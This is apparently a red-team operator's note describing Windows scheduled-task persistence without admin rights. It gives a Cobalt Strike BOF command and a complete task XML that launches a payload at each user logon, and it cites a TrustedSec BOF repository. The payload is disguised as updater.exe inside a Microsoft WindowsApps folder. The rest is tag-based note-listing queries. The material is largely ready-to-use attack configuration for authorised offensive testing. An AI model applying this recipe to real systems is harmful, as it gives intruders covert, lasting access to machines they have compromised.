Scheduled Task (Non Elevated) Persistence

Technique Info

1. run bof command (cobaltstrike): schtaskscreate \Beacon XML CREATE
2. paste in:

<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <UserId>CONTOSO\pchilds</UserId>
    </LogonTrigger>
  </Triggers>
  <Principals>
    <Principal>
      <UserId>CONTOSO\pchilds</UserId>
    </Principal>
  </Principals>
  <Settings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
  </Settings>
  <Actions>
    <Exec>
      <Command>%LOCALAPPDATA%\Microsoft\WindowsApps\updater.exe</Command>
    </Exec>
  </Actions>
</Task>

• schtaskscreate depends on https://github.com/trustedsec/CS-Remote-OPs-BOF

Related

Related Notes

All Related Notes

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "windows") OR contains(tags, "persistence") OR contains(tags, "non-elevated")
SORT file.ctime DESC

windows

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "windows")
SORT file.ctime DESC

persistence

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "persistence")
SORT file.ctime DESC

non-elevated

TABLE file.ctime as "Created", tags as "Tags"
FROM "New Notes"
WHERE contains(tags, "non-elevated")
SORT file.ctime DESC